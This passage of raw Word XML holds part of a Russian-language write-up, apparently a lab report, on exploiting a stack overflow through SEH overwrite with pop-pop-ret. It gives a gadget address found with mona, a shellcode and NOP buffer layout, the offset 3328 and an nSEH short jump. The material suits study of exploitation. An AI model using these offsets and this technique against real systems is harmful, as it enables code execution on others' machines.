          <w:noProof/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidRPr="00A7159A">
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00A7159A">
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>. Важная информация после !</w:t>
      </w:r>
      <w:r w:rsidRPr="00A7159A">
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>mona</w:t>
      </w:r>
      <w:r w:rsidRPr="00A7159A">
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A7159A">
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>findmsp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DF5EBC2" w14:textId="6F72FE76" w:rsidR="00A7159A" w:rsidRDefault="00407203" w:rsidP="00A7159A">
      <w:r>
        <w:t xml:space="preserve">Т.е. исключение происходит раньше чем </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ret</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, поэтому использовать </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>EIP</w:t>
      </w:r>
      <w:r w:rsidRPr="00407203">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">невозможно. Было принято решение экспулатировать уязвимость через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SEH</w:t>
      </w:r>
      <w:r w:rsidRPr="001E6E17">
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:t>исключения.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2998F406" w14:textId="5AB7BE48" w:rsidR="00407203" w:rsidRDefault="00407203" w:rsidP="00407203">
      <w:r>
        <w:t xml:space="preserve">SEH (Structured Exception Handling) - это механизм Windows для обработки исключений (деление на ноль, Access Violation, и т.д.). Он встроен прямо в стек, т.е. каждый поток программы имеет цепочку SEH-фреймов, вложенных друг в друга. Каждый </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SEH</w:t>
      </w:r>
      <w:r w:rsidRPr="00407203">
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:t>фрейм - э</w:t>
      </w:r>
      <w:r w:rsidRPr="00407203">
        <w:t>то структура из двух 4-байтовых полей, которая лежит прямо на стеке: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30"/>
        <w:gridCol w:w="1524"/>
      </w:tblGrid>
      <w:tr w:rsidR="00407203" w14:paraId="21036C65" w14:textId="77777777" w:rsidTr="00407203">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8330" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="43B8267D" w14:textId="68AC644C" w:rsidR="00407203" w:rsidRPr="00407203" w:rsidRDefault="00407203" w:rsidP="00407203">
            <w:pPr>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>NEXT</w:t>
            </w:r>
            <w:r w:rsidRPr="00407203">
              <w:t xml:space="preserve"> (4 </w:t>
            </w:r>
            <w:r>
              <w:t>байта)</w:t>
            </w:r>
            <w:r w:rsidRPr="00407203">
              <w:t xml:space="preserve"> – </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">указатель на следующий </w:t>
            </w:r>
            <w:r w:rsidR="00B27B02">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>SEH</w:t>
            </w:r>
            <w:r w:rsidRPr="00407203">
              <w:t>-</w:t>
            </w:r>
            <w:r>
              <w:t>фрейм в цепочке</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1524" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0AA96E91" w14:textId="51E1F62B" w:rsidR="00407203" w:rsidRPr="00407203" w:rsidRDefault="00407203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nSEH</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00407203" w14:paraId="6C6C1EAA" w14:textId="77777777" w:rsidTr="00407203">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8330" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1B622F9E" w14:textId="65BE6E7E" w:rsidR="00407203" w:rsidRPr="00407203" w:rsidRDefault="00407203" w:rsidP="00407203">
            <w:pPr>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>HANDLER</w:t>
            </w:r>
            <w:r w:rsidRPr="00407203">
              <w:t xml:space="preserve"> (</w:t>
            </w:r>
            <w:r>
              <w:t>4 байта) – адрес функции-обработчика исключения</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1524" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="20C97A78" w14:textId="731A8AB8" w:rsidR="00407203" w:rsidRPr="00407203" w:rsidRDefault="00407203" w:rsidP="00407203">
            <w:pPr>
              <w:keepNext/>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>SEH</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="560BC7BE" w14:textId="463D4833" w:rsidR="00407203" w:rsidRDefault="00407203" w:rsidP="00407203">
      <w:pPr>
        <w:pStyle w:val="aff0"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00407203">
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Таблица </w:t>
      </w:r>
      <w:r w:rsidRPr="00407203">
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00407203">
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Таблица \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00407203">
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00BE0EE6">
        <w:rPr>
          <w:b w:val="0"/>
          <w:noProof/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="00407203">
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00407203">
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00407203">
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Структура </w:t>
      </w:r>
      <w:r w:rsidRPr="00407203">
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SEH-</w:t>
      </w:r>
      <w:r w:rsidRPr="00407203">
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>фрейма</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B8C4980" w14:textId="48E34E10" w:rsidR="00407203" w:rsidRDefault="00407203" w:rsidP="00407203">
      <w:r w:rsidRPr="00407203">
        <w:t>Регистр FS:[0] всегда хранит адрес первого фрейма в цепочке.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5336A456" w14:textId="775981BA" w:rsidR="00407203" w:rsidRDefault="00407203" w:rsidP="00407203">
      <w:r>
        <w:t xml:space="preserve">Будем использовать технику эксплуатации </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SEH</w:t>
      </w:r>
      <w:r w:rsidRPr="00407203">
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>pop</w:t>
      </w:r>
      <w:r w:rsidRPr="00407203">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>pop</w:t>
      </w:r>
      <w:r w:rsidRPr="00407203">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ret</w:t>
      </w:r>
      <w:r w:rsidRPr="00407203">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="003852F2">
        <w:t>Она заключается в следующем. Когда Windows вызывает SEH-обработчик, он передаёт ему несколько аргументов через стек. В момент вызова обработчика стек выглядит примерно так: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137"/>
        <w:gridCol w:w="8717"/>
      </w:tblGrid>
      <w:tr w:rsidR="003852F2" w14:paraId="6749F8B4" w14:textId="77777777" w:rsidTr="003852F2">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="959" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="615FE209" w14:textId="3317E363" w:rsidR="003852F2" w:rsidRPr="003852F2" w:rsidRDefault="003852F2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ESP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8895" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="366F4F82" w14:textId="624D8040" w:rsidR="003852F2" w:rsidRDefault="003852F2" w:rsidP="00407203">
            <w:pPr>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="003852F2">
              <w:t>адрес структуры EXCEPTION_RECORD</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003852F2" w14:paraId="7ED3725D" w14:textId="77777777" w:rsidTr="003852F2">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="959" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1BD7005D" w14:textId="428C8F72" w:rsidR="003852F2" w:rsidRPr="003852F2" w:rsidRDefault="003852F2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ESP+4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8895" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2235A3A3" w14:textId="350E8D50" w:rsidR="003852F2" w:rsidRPr="003852F2" w:rsidRDefault="003852F2" w:rsidP="00407203">
            <w:pPr>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="003852F2">
              <w:t xml:space="preserve">адрес EstablisherFrame - указатель на сам </w:t>
            </w:r>
            <w:r w:rsidRPr="003852F2">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>SEH</w:t>
            </w:r>
            <w:r w:rsidRPr="003852F2">
              <w:t xml:space="preserve">-фрейм в стеке (то есть на </w:t>
            </w:r>
            <w:r w:rsidRPr="003852F2">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>nSEH</w:t>
            </w:r>
            <w:r w:rsidRPr="003852F2">
              <w:t>/</w:t>
            </w:r>
            <w:r w:rsidRPr="003852F2">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>SEH</w:t>
            </w:r>
            <w:r w:rsidRPr="003852F2">
              <w:t xml:space="preserve"> пару)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003852F2" w14:paraId="15D881FC" w14:textId="77777777" w:rsidTr="003852F2">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="959" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="10D744F0" w14:textId="7C76AD3C" w:rsidR="003852F2" w:rsidRPr="003852F2" w:rsidRDefault="003852F2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ESP+8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8895" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2D7C5513" w14:textId="6E50907E" w:rsidR="003852F2" w:rsidRPr="003852F2" w:rsidRDefault="003852F2" w:rsidP="00407203">
            <w:pPr>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="003852F2">
              <w:t>адрес CONTEXT record - содержит значения регистров процессора в вызвавшем исключение потоке на момент его возникновения</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003852F2" w:rsidRPr="003852F2" w14:paraId="16C84E42" w14:textId="77777777" w:rsidTr="003852F2">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="959" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2DFF7059" w14:textId="10C19660" w:rsidR="003852F2" w:rsidRPr="003852F2" w:rsidRDefault="003852F2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ESP+12</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8895" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3B85CAF8" w14:textId="52B40561" w:rsidR="003852F2" w:rsidRPr="003852F2" w:rsidRDefault="003852F2" w:rsidP="003852F2">
            <w:pPr>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="003852F2">
              <w:t xml:space="preserve">адрес </w:t>
            </w:r>
            <w:r w:rsidRPr="003852F2">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>DISPATCHER</w:t>
            </w:r>
            <w:r w:rsidRPr="003852F2">
              <w:t>_</w:t>
            </w:r>
            <w:r w:rsidRPr="003852F2">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>CONTEXT</w:t>
            </w:r>
            <w:r>
              <w:t>-</w:t>
            </w:r>
            <w:r w:rsidRPr="003852F2">
              <w:t xml:space="preserve"> содержит служебную информацию, необходимую для диспетчеризации исключений и поиска обработчиков</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3FD2B235" w14:textId="6D8B2627" w:rsidR="003852F2" w:rsidRPr="00BE0EE6" w:rsidRDefault="003852F2" w:rsidP="00407203">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Если выполнить </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>pop</w:t>
      </w:r>
      <w:r w:rsidRPr="003852F2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>pop</w:t>
      </w:r>
      <w:r w:rsidRPr="003852F2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ret</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, то первый </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>pop</w:t>
      </w:r>
      <w:r w:rsidRPr="003852F2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">снимет </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>EXCEPTION</w:t>
      </w:r>
      <w:r w:rsidRPr="003852F2">
        <w:t>_</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>RECORD</w:t>
      </w:r>
      <w:r w:rsidRPr="003852F2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">со стека, второй </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>pop</w:t>
      </w:r>
      <w:r w:rsidRPr="003852F2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">снимет второй аргумент и </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ESP</w:t>
      </w:r>
      <w:r w:rsidRPr="003852F2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">будет указывать на </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ESstablisherFrame</w:t>
      </w:r>
      <w:r w:rsidRPr="003852F2">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ret</w:t>
      </w:r>
      <w:r w:rsidRPr="003852F2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">делает </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>pop</w:t>
      </w:r>
      <w:r w:rsidRPr="003852F2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>EIP</w:t>
      </w:r>
      <w:r w:rsidRPr="003852F2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>из стека,</w:t>
      </w:r>
      <w:r w:rsidR="00B06DF1">
        <w:t xml:space="preserve"> т.е. берет адрес </w:t>
      </w:r>
      <w:r w:rsidR="00D41248">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SEH</w:t>
      </w:r>
      <w:bookmarkStart w:id="3" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="3"/>
      <w:r w:rsidR="00B06DF1" w:rsidRPr="00B06DF1">
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidR="00B06DF1">
        <w:t xml:space="preserve">фрейма, и поток управления переходит на </w:t>
      </w:r>
      <w:r w:rsidR="00B06DF1">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>nSEH</w:t>
      </w:r>
      <w:r w:rsidR="00B06DF1" w:rsidRPr="00B06DF1">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00BE0EE6" w:rsidRPr="00BE0EE6">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BE0EE6">
        <w:t xml:space="preserve">Адрес </w:t>
      </w:r>
      <w:r w:rsidR="00BE0EE6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>pop</w:t>
      </w:r>
      <w:r w:rsidR="00BE0EE6" w:rsidRPr="00BE0EE6">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BE0EE6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>pop</w:t>
      </w:r>
      <w:r w:rsidR="00BE0EE6" w:rsidRPr="00BE0EE6">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BE0EE6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ret</w:t>
      </w:r>
      <w:r w:rsidR="00BE0EE6" w:rsidRPr="00BE0EE6">
        <w:t xml:space="preserve"> 0</w:t>
      </w:r>
      <w:r w:rsidR="00BE0EE6" w:rsidRPr="00BE0EE6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>x</w:t>
      </w:r>
      <w:r w:rsidR="00BE0EE6" w:rsidRPr="00BE0EE6">
        <w:t>625012</w:t>
      </w:r>
      <w:r w:rsidR="00BE0EE6" w:rsidRPr="00BE0EE6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>f</w:t>
      </w:r>
      <w:r w:rsidR="00BE0EE6" w:rsidRPr="00BE0EE6">
        <w:t xml:space="preserve">3 </w:t>
      </w:r>
      <w:r w:rsidR="00BE0EE6">
        <w:t xml:space="preserve">был найден в </w:t>
      </w:r>
      <w:r w:rsidR="00BE0EE6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>func</w:t>
      </w:r>
      <w:r w:rsidR="00BE0EE6" w:rsidRPr="00BE0EE6">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00BE0EE6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>dll</w:t>
      </w:r>
      <w:r w:rsidR="00BE0EE6">
        <w:t xml:space="preserve">с помощью </w:t>
      </w:r>
      <w:r w:rsidR="00BE0EE6" w:rsidRPr="00BE0EE6">
        <w:t>!</w:t>
      </w:r>
      <w:r w:rsidR="00BE0EE6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>mona</w:t>
      </w:r>
      <w:r w:rsidR="00BE0EE6" w:rsidRPr="00BE0EE6">
        <w:t xml:space="preserve"> seh -m func.dll.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73B3AAE4" w14:textId="002E0DBF" w:rsidR="00B06DF1" w:rsidRDefault="00B06DF1" w:rsidP="00407203">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>В</w:t>
      </w:r>
      <w:r w:rsidRPr="00B06DF1">
        <w:t xml:space="preserve"> 4 </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">байта </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>nSEH</w:t>
      </w:r>
      <w:r w:rsidRPr="00B06DF1">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>необходимо записать короткий прыжок на 6 байт вперед (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>jmp</w:t>
      </w:r>
      <w:r w:rsidRPr="00B06DF1">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>short</w:t>
      </w:r>
      <w:r w:rsidRPr="00B06DF1">
        <w:t xml:space="preserve">+6 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>nop</w:t>
      </w:r>
      <w:r w:rsidRPr="00B06DF1">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>nop</w:t>
      </w:r>
      <w:r w:rsidRPr="00B06DF1">
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Это позволяет перепрыгнуть оставшиеся 2 байта </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>nSEH</w:t>
      </w:r>
      <w:r w:rsidRPr="00B06DF1">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">и 4 байта </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SHE</w:t>
      </w:r>
      <w:r w:rsidRPr="00B06DF1">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">на записанный трамплин, ведущий на шеллкод. Трамплин и помещение шеллкода в начало буфера, а не сразу после </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SEH</w:t>
      </w:r>
      <w:r w:rsidRPr="00B06DF1">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>было сделано для того, чтоб для шеллкода точно хватило места. Т.е. буфер в стеке выглядит следующим образом</w:t>
      </w:r>
      <w:r>
        <w:rPr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B06DF1" w14:paraId="51A9B78B" w14:textId="77777777" w:rsidTr="00B06DF1">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4927" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="308274F7" w14:textId="204624D9" w:rsidR="00B06DF1" w:rsidRPr="00B06DF1" w:rsidRDefault="00B06DF1" w:rsidP="00407203">
            <w:pPr>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Shellcode (425 </w:t>
            </w:r>
            <w:r>
              <w:t>байт)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4927" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="17CDEA7F" w14:textId="2CDE3F6D" w:rsidR="00B06DF1" w:rsidRPr="00B06DF1" w:rsidRDefault="00B06DF1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Offset 0 </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B06DF1" w14:paraId="23E2373F" w14:textId="77777777" w:rsidTr="00B06DF1">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4927" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="76F32C2E" w14:textId="656C47AF" w:rsidR="00B06DF1" w:rsidRPr="00B06DF1" w:rsidRDefault="00B06DF1" w:rsidP="00407203">
            <w:pPr>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">\x90 (3328-425=2903 </w:t>
            </w:r>
            <w:r>
              <w:t>байт)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4927" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="69F2D4FF" w14:textId="77777777" w:rsidR="00B06DF1" w:rsidRDefault="00B06DF1" w:rsidP="00407203">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B06DF1" w14:paraId="3C765011" w14:textId="77777777" w:rsidTr="00B06DF1">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4927" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="386E21FC" w14:textId="10B8FC03" w:rsidR="00B06DF1" w:rsidRPr="00BE0EE6" w:rsidRDefault="00B06DF1" w:rsidP="00407203">
            <w:pPr>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">nSEH: jmp </w:t>
            </w:r>
            <w:r w:rsidR="00BE0EE6">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">short+6 (4 </w:t>
            </w:r>
            <w:r w:rsidR="00BE0EE6">
              <w:t>байта)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4927" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="741A9FEE" w14:textId="5FF3248F" w:rsidR="00B06DF1" w:rsidRPr="00BE0EE6" w:rsidRDefault="00BE0EE6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Offset 3328</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B06DF1" w14:paraId="4E886FD4" w14:textId="77777777" w:rsidTr="00B06DF1">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4927" w:type="dxa"/>
          </w:tcPr>
